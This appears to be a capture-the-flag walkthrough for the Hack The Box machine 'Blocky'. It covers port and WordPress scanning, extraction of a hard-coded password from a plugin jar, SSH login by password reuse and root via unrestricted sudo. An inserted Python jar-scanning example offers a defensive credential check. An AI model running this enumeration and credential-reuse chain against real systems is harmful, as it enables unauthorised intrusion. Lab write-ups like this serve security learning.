# HTB - Blocky

![Blocky](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3ha5HOTVdvsLEb_VnZ%2F-M3jBayoEb4NqX4arp7Z%2Fimage.png?alt=media\&token=cefe94b4-d74a-4751-9dd0-cc8b3cc0d40a)

## Getting Root:

1. Found a jar file under **`/plugins`** that contained hard-coded credentials, which also worked for **`phpMyAdmin`**
2. Found a user named **`notch`** from the WordPress scan and was able to ssh to the box using the password found in the file from step 1
3. The user had **`(ALL : ALL) ALL`** in the sudoers file, so we were able to get root.

### Tools Used:

**`wpscan, dirsearch.py, jar, javap`**

## Nmap

```bash
nmap -sC -sV -p- 10.10.10.37 -oA nmap/Blocky.allports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 00:30 EDT
Nmap scan report for 10.10.10.37
Host is up (0.041s latency).
Not shown: 65530 filtered ports
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft &#8211; Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.88 seconds
```

## Enumeration

### WPScan

Found a user named: **notch**

```bash
wpscan --url http://10.10.10.37 -e
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.11
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Tue Mar 31 01:42:55 2020

Interesting Finding(s):

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
```

### Dirsearch.py

```bash
# dirsearch.py -u http://10.10.10.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E --plain-text-report Blocky_Dirb.txt

200   51KB   http://10.10.10.37:80/
301   309B   http://10.10.10.37:80/wiki
301   315B   http://10.10.10.37:80/wp-content
301   312B   http://10.10.10.37:80/plugins
301   316B   http://10.10.10.37:80/wp-includes
301   315B   http://10.10.10.37:80/javascript
301   313B   http://10.10.10.37:80/wp-admin
301   315B   http://10.10.10.37:80/phpmyadmin
403   299B   http://10.10.10.37:80/server-status
```

There were two files under **`http://10.10.10.37/plugins`**, so we decided to have a look.

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3jCxCy-iVYSSdh2W1e%2F-M3jE0-ozWcqIV94U7zR%2Fimage.png?alt=media\&token=b78ff215-28b2-4fce-93e3-4881d385ccaf)

We downloaded the two files and checked them for anything interesting:

```bash
# The two downloaded files
BlockyCore.jar
griefprevention-1.11.2-3.1.1.298.jar

# To list their contents we can use:
jar -tf BlockyCore.jar 
# The result is something like:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
META-INF/MANIFEST.MF
com/myfirstplugin/BlockyCore.class

# We can use the javap to disassemble the class files
javap -c com/myfirstplugin/BlockyCore.class

# That produced the following output
Compiled from "BlockyCore.java"
public class com.myfirstplugin.BlockyCore {
  public java.lang.String sqlHost;

  public java.lang.String sqlUser;

  public java.lang.String sqlPass;

  public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."<init>":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return
```

#### Credentials:

**`root:8YsqfCTnvxAUeduzjNSXe22`**
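As an added example (not part of the original walkthrough), the following Python script automates what `jar -tf` and `javap -c` revealed above: it opens every `.class` inside a jar, parses the constant pool for the `CONSTANT_String` literals that `ldc` loads, and flags the credential-looking ones, which is the check a defender can run over a plugin directory before deploying it. The jar it scans is a constructed fixture that mimics the BlockyCore layout; it is not the real plugin's bytes, and the secret heuristic (`SECRET_RE`) is an assumption of this example.

```python
import io, re, struct, zipfile

_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}  # fixed entry widths by tag (JVM spec 4.4)
# Heuristic (assumption): a credential-like literal is 12+ chars mixing letters and digits.
SECRET_RE = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)[A-Za-z0-9!@#$%^&*_.-]{12,}$")

def class_string_constants(data: bytes) -> list[str]:
    """Return the CONSTANT_String literals of a .class file (the values `ldc` loads)."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack_from(">H", data, 8)[0]        # constant_pool_count
    pos, i, utf8, refs = 10, 1, {}, []
    while i < count:
        tag = data[pos]; pos += 1
        if tag == 1:                                    # CONSTANT_Utf8: u2 length + bytes
            n = struct.unpack_from(">H", data, pos)[0]
            utf8[i] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        else:
            if tag == 8:                                # CONSTANT_String: u2 index of a Utf8
                refs.append(struct.unpack_from(">H", data, pos)[0])
            pos += _FIXED[tag]
        i += 2 if tag in (5, 6) else 1                  # long/double occupy two pool slots
    return [utf8[r] for r in refs if r in utf8]

def jar_credential_candidates(jar_bytes: bytes) -> dict[str, list[str]]:
    """Map each .class entry in a jar to its credential-looking string literals."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                if hits := [s for s in class_string_constants(jar.read(name)) if SECRET_RE.match(s)]:
                    found[name] = hits
    return found

def build_class(utf8s: list[str], string_idx: list[int]) -> bytes:
    """Constructed fixture: class header plus a pool of Utf8 and String entries (rest omitted)."""
    pool = b"".join(b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in utf8s)
    pool += b"".join(b"\x08" + struct.pack(">H", i) for i in string_idx)
    return b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", len(utf8s) + len(string_idx) + 1) + pool

def sample_jar() -> bytes:
    """Constructed jar mimicking the BlockyCore layout; not the real plugin's bytes."""
    utf8s = ["com/myfirstplugin/BlockyCore", "sqlPass", "Ljava/lang/String;",
             "localhost", "root", "8YsqfCTnvxAUeduzjNSXe22"]          # Utf8 entries #1..#6
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/myfirstplugin/BlockyCore.class", build_class(utf8s, [4, 5, 6]))
    return buf.getvalue()
```

Running `jar_credential_candidates(sample_jar())` reports only the password literal, since `localhost` and `root` fail the letters-plus-digits heuristic.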

## Exploitation

Using those credentials, we can log in to **`phpMyAdmin`**.

![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3jGd1U5LjTeSi7izTI%2F-M3jHh_O5J0R29cTzbJo%2Fimage.png?alt=media\&token=7302db03-45b1-4c07-8c56-31a652117629)

However, the same password also works for the user **`notch`** (found via the WPScan), so we can ssh straight to the box and get the user flag.

```bash
ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Mar 31 01:00:33 2020 from 10.10.14.3
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) 
```

## Privilege Escalation

```bash
notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ 
notch@Blocky:~$ 
notch@Blocky:~$ sudo su -
root@Blocky:~# 
root@Blocky:~# id 
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# 
root@Blocky:~# 
```
